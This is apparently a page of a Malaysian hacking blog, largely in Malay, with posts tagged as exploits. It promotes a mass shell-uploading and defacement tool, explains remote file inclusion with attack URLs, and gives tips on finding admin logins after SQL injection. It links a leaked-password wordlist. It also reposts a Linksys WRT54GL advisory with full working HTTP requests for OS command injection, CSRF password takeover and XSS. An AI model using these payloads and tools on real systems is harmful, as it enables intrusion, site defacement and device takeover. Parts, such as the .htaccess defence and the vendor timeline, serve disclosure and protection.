Showing posts with label [GH Exploit]. Show all posts
Showing posts with label [GH Exploit]. Show all posts

Arbitrary file uploader


Author: NoEntry and Tazme
Title : Arbitrary file uploader
Date : 26/6/2013
Home : Blog.phc.my
Tested: Windows 7, vista, 8 , XP

//PhcTeam 2011-2013\\

1- Tool ini berupaya mengupload file/shell anda jika website yang ditarget adalah vuln
2- Tool ini mempunyai mass uploader, single uploader , zone-h mass poster
3- Google dork sudah disetkan didalam tool
4- Untuk maklumat lanjut PM page Phc : https://www.facebook.com/pages/Phantom-Crews/205703072814125
5- Google.com boleh membantu anda dan video tutorial coming soon ...


Greetz: Ahli PhantomCrews aka PhcTeam 2011-2013

Hack Dengan Kaedah RFI [Remote File Inclusion ] Bagaimana ia berfungsi?

Assalamualaiikum dan selamat sejahtera.RFI atau Remote file inclusion sekarang menjadi salah satu kaedah yang selalu digunakan penggodam selain kaedah suntikan SQL.Jadi kami di [GH] cuba mencari info bagaimana ia berfungsi.

"Remote file inclusion" atau lebih mesra dikenali sebagai "R.F.I" adalah salah satu serangan terhadap laman web dengan membolehkan pihak penyerang menjalankan skrip atau aturcara mereka tersendiri. Kesannya bergantung kepada jenis skrip yang dimasukkan oleh pihak penyerang.

Sekiranya mereka menjalankan aturcara membuang pangkalan data, maka ke semua laman web anda tidak dapat dijalankan memandangkan pangkalan data anda sudah dibuang.

Akhirnya, anda terpaksa mengembalikan pangkalan data yang telah disalin sebelum ini bagi membolehkan laman web berjalan semula seperti biasa. Sehubungan dengan itu, anda boleh gunakan artikel ini sebagai panduan untuk menyelamatkan laman web dari digondam melalui cara ini seandainya anda menggunakan skrip laman web tersendiri. Jika menggunakan CMS, tidak perlu risau mengenainya.

Cara Serangan RFI
Kaedah serangan RFI ini sebenarnya bergantung kepada cara penulisan skrip anda di laman web yang telah dikesan oleh pihak penyerang.

Untuk melakukan penyerang perlu tahu secara lengkap skrip yang anda jalankan. Berikut adalah antara contoh aturcara laman web anda yang telah membuka ruang kepada penyerang dan semestinya dijalankan pada pelayan yang menggunakan PHP.
include($page . '.php');

Aturcara di atas dituliskan dalam satu fail .php yang bakal memproses maklumat yang dihantar contohnya satu laman web borang, selepas diklik butang "Hantar", semua maklumat yang dimasukkan oleh pengguna akan ditujukan ke laman ini. Katakan nama fail tersebut adalah index.php.

Maka selepas diklik butang "Hantar", alamat URL di pelayar web (web browser) akan bertukar menjadi seperti ini:
http://www.websaya.com/index.php?page=arkib

Di mana, bahagian aturcara di dalam index.php akan ditukarkan kepada pembolehubah yang dinyatakan dalam URL menjadi seperti ini:
include('arkib.php');

dan secara tersendirinya, fail index.php akan memanggil fail arkib.php ke dalamnya dan proses seterusnya dijalankan. Oleh kerana pembolehubah $page dalam index.php tidak dinyatakan nilaian asal (default) maka pengondam akan menggunakan pembolehubah ini untuk memasukkan nilaian dari laman web yang lain. Contohnya:
http://www.websaya.com/index.php?page=http://www.weblain.com/virus.php

dan di bahagian index.php pula, pembolehubah include akan menafsirkan nilaian tersebut menjadi seperti ini:
include('http://www.weblain.com/virus.php.php');

Tetapi oleh kerana pihak pengondam tidak mengetahui secara lengkap apakah jenis sambungan yang anda akan tetapkan, jadi mereka akan meletakkan tanda "?" dibelakang alamat URL bagi membolehkan aturcara dibahagian pelayan melepaskan fail tersebut untuk diproses.

Tanda "?" membawa maksud supaya pihak pelayan (server) menentukan sendiri bentuk fail tersebut. Sekiranya sambungan yang telah ditetapkan adalah .php, maka dengan sendiri fail tersebut dilepaskan.

Sekiranya sambungan dibahagian include ditetapkan kepada .ini berbanding .php seperti include($page . '.ini'); maka "?" akan menjadikan sambungan seterusnya sebagai pembolehubah yang lain. Sebagai contoh:
include($page . '.ini');

dan "URL injection" yang dimasukkan adalah seperti ini:
http://www.websaya.com/index.php?page=http://www.weblain.com/virus.php?

maka, proses yang berlaku di dalam index.php adalah:
include('http://www.weblain.com/virus.php?.ini');

pada asalnya, bagi menjalankan aturcara, pengondam seharusnya menggunakan sambungan fail .ini. Tetapi pihak pembangunan telah meletakkan sambungan .ini berbanding .php. Oleh kerana kehadiran "?", maka dibahagian pelayan (server) tetap menjalankan proses dengan memanggil fail tersebut walaupun sambungan berlainan kerana tanda "?" menjadikan sambungan .ini sebagai satu pembolehubah yang lain.

Dengan ini, fail virus.php tersebut dengan sendirinya akan dimasukkan ke dalam index.php dan dijalankan. Seterusnya akan merosakkan laman web anda mengikut aturcara yang ditulis oleh pihak pengondam.

Kenapa serangan ini boleh dijalankan
register_global dihidupkan. register_global membolehkan PHP mengambil secara pembolehubah yang dinyatakan di dalam URL tanpa melalui proses tapisan sekuriti terlebih dahulu. Oleh sebab itu, kebiasaanya untuk pelayan-pelayan web (server) yang baru, fungsi ini dimatikan secara asalnya.

allow_url_fopen
dihidupkan. Fungsi ini membenarkan PHP untuk memasukkan sebarang maklumat atau membuka ruang untuk kemasukkan fail yang lain dari domain yang asal (kiranya memasukkan fail dari tempat yang lain). Oleh sebab itu, dalam versi PHP 5.2, fungsi ini telah diubahsuai dan diasingkan yang mana untuk fungsi include(), allow_url_include telah diwujudkan dan tetapan ini telah dimatikan secara sendirinya.

Cara mengatasi serangan RFI
Terdapat beberapa cara yang boleh kita lakukan untuk mengatasi dan melindungi laman web dari terkena serangan ini tetapi di sini saya cuma tunjukkan satu cara sahaja iaitu dengan menggunakan .htaccess fail. Sebelum itu, perlu pastikan bahawa pelayan menyokong "mod_rewrite"

Dengan menggunakan arahan di bawah ini, ia akan memeriksa sebarang permintaan yang datang dari URL luaran iaitu http://, https:// dan ftp://
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)

Seterusnya dengan memasukkan kod di atas di dalam .htaccess dan diikuti dengan beberapa arahan lain seperti:
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)
RewriteRule ^(.+)$ - [F]

Seandainya anda mempunyai akses terus ke dalam pelayan untuk mengendalikan beberapa modul-modul server, anda boleh gunakan arahan ini:
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)
RewriteRule ^(.+)$ - [env=rfi:true]
</IfModule>
CustomLog /path/to/logs/rfi.log combined env=rfi

Sumber Rujukan

Kaedah Mencari "Admin Login" di Laman Web

Assalamualaiikum dan selamat sejahtera.
Mencari halaman "Admin Login" kadang kala sangat sukar, Disini [GH] kongsikan sedikit tips yang mungkin membantu anda.Setelah sesuatu web terdedah kepada suntikan SQL (SQLI)  mungkin mudah untuk mendapat nama pengguna dan katalaluan, langkah seterusnya ialah  mencari halaman Log masuk "Admin Login" untuk masuk sebagai pemilik laman berkenaan.

Dibawah adalah beberapa kaedah / Tips untuk mencari halaman log masuk pentadbir "Admin Login"
1.Menambah Url
ni adalah kaedah yang pertama dan paling mudah untuk mencari laman login admin. Anda boleh menambah beberapa perkataan selepas URL.contoh:
www.site.com/admin
www.site.com/administrator
www.site.com/login
www.site.com/wp-login.php
www.site.com/admin.php

2.Mengguna Crawling software
Anda boleh menggunakan pelbagai alat jenis Crawling software untuk merangkak ke dalam laman web untuk mendapatkan halaman "Admin Login". ia mencari semua muka surat/page didalam laman web dan memaparkan senarai semua laman di direktori.

3.Robots.txt
pemilik laman web sebenarnya memberikan senarai pautan yang tidak boleh dicari oleh enjin pencarian "Search Engine".kadang kala pemilik akan menyembunyikan Halaman "Admin Login" Mereka pada robots.txt. secara langsung anda boleh melihat di fail robots.txt dengan menambah /robots.txt pada Url.
Contoh: www.site.com/robots.txt

4.Google Dork'
Ada juga boleh menggunakan google dork untuk mencari halaman "Admin Login" contoh seperti:
#Site:site.com “admin”
#Site:site.com inurl:login
#site:site.com intitle:"admin login"

5.Online
Terdapat juga beberapa laman web yang menyediakan perkhidmatan mencari halaman "Admin Login" secara online, anda juga boleh menggunakan laman web ini untuk mencari halaman "Admin Login" [Link+]

6.Havij
Havij merupakan salah satu software yang sangat popular sehingga ke hari ini,ia juga mempunyai pengimbas untuk membantu anda menemukan halaman "Admin Login"

7.Dan Banyak Lagi.. ^_^

Sebagai Tindakan, anda mungkin dapat mencegah penggodam khasnya yang berniat jahat untuk masuk ke dalam halaman anda,Jadi cuba elakan  perkara yang tersenarai diatas dari ditemukan oleh mereka.. sekian..

Dapatkan Tshirt GilerHackers Percuma!

Assalamualaiikum dan selamat Sejahtera.
Dpatakan Tshirt Percuma GilerHackers, Buat masa sekarang [GH] menawarkan 2 jenis koleksi Tshirt Kami, iaitu Baju GilerHackers Edisi Ke-2 dan Baju Iam Programmer I Have No Life,kedua-dua jenis tshirt ini sudah tidak dijual,Inilah masa untuk collect Baju GilerHackers!

Untuk mendapat Tshirt ini, anda perlu menukar sebanyak 12000 points, Bagaimana nak dapat point? sila semak posting sebelum ini untuk tahu bagaimana mendapat Point/mata untuk setiap lawatan ke GilerHackers.com

Selain Baju Ada Hadiah Lain tak?
Okey mari kami kenalkan sedikit pembaharuan tentang sistem GHpoint ini, bagi mereka yang mengumpul mata dan memasang banner, kedua-dua mempunyai kelebihan sendiri, untuk GHpoint, anda boleh menukar hadiah yang ditawarkan, bagi pemasang banner, Pemasang banner berpontensi untuk membuka kotak hadiah misteri tanpa menebus mata.

Hadiah
[GH] akan mengemaskini hadiah hadiah terbaru setiap bulan di catalog, sila semak di catalog.
Jika kedua dua baju ditebus mungkin ada lagi barang menarik [GH]
Selepas Hadiah anda ditebus, Point/Mata anda juga ditolak mengikut jumlah barangan yang ditebus.Jadi kami cadangkan anda supaya bijak didalam menebus setiap barangan [GH]. Jika barang yang tersedia tidak bersesuaian dengan anda.. anda boleh simpan Point / Mata untuk menebus barangan yang lain.

Tips.
Setiap aktiviti mendapat mata
Komen = +100 mata (awas jika spam atau komen yang tidak mendatangkan faedah, anda secara automatik diban)
Share = +100 mata
Like = +100 mata
Tweet = + 50 mata
Setiap Lawatan = +100 mata
Follow twitter = +100 mata
Add to Timeline = +100 mata
dan lain lain sila explore sendiri.

*Pertanyaan sila info kami Difacebook
*Jika anda tidak tersenarai didalam Leaderboard, kemungkinan anda telah diban,sila hubungi kami di facebook

Senarai Terbesar "Wordlist" Berjuta Perkataan Untuk Password Cracking


Assalamualaiikum dan selamat sejahtera.
Salah satu koleksi terbesar dan sangat menyeluruh sebanyak 1493677782 perkataan untuk Password cracking sedia untuk dimuat turun!. Senarai perkataan ini bertujuaan terutamanya untuk Password Cracking (pemecahan kata laluan) seperti hashcat, John the Ripper dan password recovery utilities.

Defuse security telah mengeluarkan sebesar 4.2 GiB (compressed) atau 15 GiB (uncompressed) yang digunakan oleh mereka untuk Crackstation project.Senarai wordlist ini asalnya dikongsi oleh ' Stun ', salah satu dari Hacktivist Anonymous. Anda juga boleh memuat turun semua senarai wordlist ini dari Torrent .

Muat turun senarai wordlist dari torrent

Exabytes SiteLock

"Senarai ini mengandungi setiap wordlist, kamus, dan kata laluan pangkalan data yang bocor di internet (dan saya menghabiskan banyak masa untuk mencari). Ia juga mengandungi setiap perkataan dalam pangkalan data Wikipedia (halaman-artikel, diambil 2010, dalam semua bahasa) serta banyak buku-buku dari Projek Gutenberg. Ia juga termasuk kata laluan daripada beberapa pangkalan data pelanggaran berprofil rendah yang dijual pada tahun-tahun yang lalu di bawah tanah.(underground)" -Stun

Sumber Rujukan : THN

Hack IOS 6.1 Lock Screen


Apple telah menghadapi beberapa cabaran sejak tahun lepas berkaitan dengan kesilapan perisian dan kelemahan pada iPhone. Menurut video terbaru yang disiarkan di bawah YouTube dan pengguna iPad menjalankan IOS terbaru platform 6.1 boleh memintas skrin kunci, walaupun apabila kata laluan yang sudah ditetapkan.


[GH Exploit] Joomla com_collecter shell upload




# Exploit Title:Joomla com_collecter shell upload
# Author: Red Dragon_al (Alb0zZ Team)
# Home :HackForums.AL,alb0zz.in
# Date :19/01/2013

[GH Exploit] Linksys WRT54GL 1.1 XSS / OS Command Injection


Device Name: Linksys WRT54GL v1.1
Vendor: Linksys/Cisco
============ Vulnerable Firmware Releases: ============
Firmware Version: 4.30.15 build 2, 01/20/2011

============ Device Description: ============
The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.
Source: http://homesupport.cisco.com/en-us/support/routers/WRT54GL
============ Shodan Torks ============
Shodan Search: WRT54GL
= Results 27190 devices
============ Vulnerability Overview: ============
* OS Command Injection
= parameter: wan_hostname
= command: `%20ping%20192%2e168%2e178%2e101%20`
The vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. With wget it is possible to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png
POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/index.asp
Authorization: Basic xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Connection: close
submit_button=indexchange_action=submit_type=action=Applynow_proto=dhcpdaylight_time=1lan_ipaddr=4wait_time=0need_reboot=0ui_language=dewan_proto=dhcprouter_name=testwan_hostname=`%20ping%20192%2e168%2e178%2e101%20`wan_domain=testmtu_enable=1wan_mtu=1500lan_ipaddr_0=192lan_ipaddr_1=168lan_ipaddr_2=178lan_ipaddr_3=166lan_netmask=255.255.255.0lan_proto=dhcpdhcp_check=dhcp_start=100dhcp_num=50dhcp_lease=0wan_dns=4wan_dns0_0=0wan_dns0_1=0wan_dns0_2=0wan_dns0_3=0wan_dns1_0=0wan_dns1_1=0wan_dns1_2=0wan_dns1_3=0wan_dns2_0=0wan_dns2_1=0wan_dns2_2=0wan_dns2_3=0wan_wins=4wan_wins_0=0wan_wins_1=0wan_wins_2=0wan_wins_3=0time_zone=-08+1+1_daylight_time=1
= Change the request method from HTTP Post to HTTP GET makes the exploitation easier:
http://192.168.178.166/apply.cgi?submit_button=indexchange_action=submit_type=action=Applynow_proto=dhcpdaylight_time=1lan_ipaddr=4wait_time=0need_reboot=0ui_language=dewan_proto=dhcprouter_name=testwan_hostname=`%20ping%20192%2e168%2e178%2e101%20`wan_domain=testmtu_enable=1wan_mtu=1500lan_ipaddr_0=192lan_ipaddr_1=168lan_ipaddr_2=178lan_ipaddr_3=166lan_netmask=255.255.255.0lan_proto=dhcpdhcp_check=dhcp_start=100dhcp_num=50dhcp_lease=0wan_dns=4wan_dns0_0=0wan_dns0_1=0wan_dns0_2=0wan_dns0_3=0wan_dns1_0=0wan_dns1_1=0wan_dns1_2=0wan_dns1_3=0wan_dns2_0=0wan_dns2_1=0wan_dns2_2=0wan_dns2_3=0wan_wins=4wan_wins_0=0wan_wins_1=0wan_wins_2=0wan_wins_3=0time_zone=-08+1+1_daylight_time=1
= This setting is placed permanent into the configuration and so it gets executed on every bootup process of the device.
* For changing the current password there is no request to the current password
With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Management.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 299
submit_button=Managementchange_action=action=ApplyPasswdModify=1remote_mgt_https=0http_enable=1https_enable=0wait_time=4need_reboot=0http_passwd=pwndhttp_passwdConfirm=pwnd_http_enable=1web_wl_filter=0remote_management=1http_wanport=8080upnp_enable=1upnp_config=1upnp_internet_dis=0
* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:
http://IP/apply.cgi?submit_button=Managementchange_action=action=ApplyPasswdModify=1remote_mgt_https=0http_enable=1https_enable=0wait_time=4need_reboot=0http_passwd=pwnd1http_passwdConfirm=pwnd1_http_enable=1web_wl_filter=0remote_management=1http_wanport=8080upnp_enable=1upnp_config=1upnp_internet_dis=0
* reflected XSS
= parameter: submit_button
Injecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png
POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Wireless_Basic.asp
Authorization: Basic xxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
submit_button=Wireless_Basic'%3balert('pwnd')//action=Applysubmit_type=change_action=next_page=wl_net_mode=mixedwl_ssid=testwl_channel=6wl_closed=0
* stored XSS (Access Restrictions - Richtliniennamen eingeben (place the XSS) - Zusammenfassung (Scriptcode gets executed)
= parameter: f_name
Injecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png
= Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:
http://192.168.178.166/apply.cgi?submit_button=Filterschange_action=submit_type=saveaction=Applyblocked_service=filter_web=filter_policy=f_status=0f_id=1f_status1=disablef_name=123"img%20src%3d"0"%20onerror%3dalert("XSSed1")f_status2=allowday_all=1time_all=1allday=blocked_service0=Noneblocked_service1=Nonehost0=host1=host2=host3=url0=url1=url2=url3=url4=url5=
============ Solution ============
Upgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.
Fixed Version: Ver.4.30.16 (Build 2)
Available since 10.01.2013
Download: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL
============ Credits ============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-001
Twitter: @s3cur1ty_de
============ Time Line: ============
September 2012 - discovered vulnerability
03.10.2012 - Contacted Linksys and give them detailed vulnerability details
03.10.2012 - Linksys responded with a case number
11.10.2012 - Status update from Linksys
23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware
29.10.2012 - Send the Beta Agreement back
29.10.2012 - Linksys gives access to the new Beta Firmware
30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed
30.10.2012 - Linksys responded that there is no ETA of the new firmware
17.01.2013 - Linksys informed me about the public release of mostly fixed version (XSS, OS Command Injection fixed)
18.01.2013 - public release
===================== Advisory end =====================
 

© Copyright 2013 [GH] GilerHackers! All Rights Reserved.
Beo v.3 Themes Design by BukhariMalek | Contact On Facebook Diselenggara Oleh: IdeaKreatif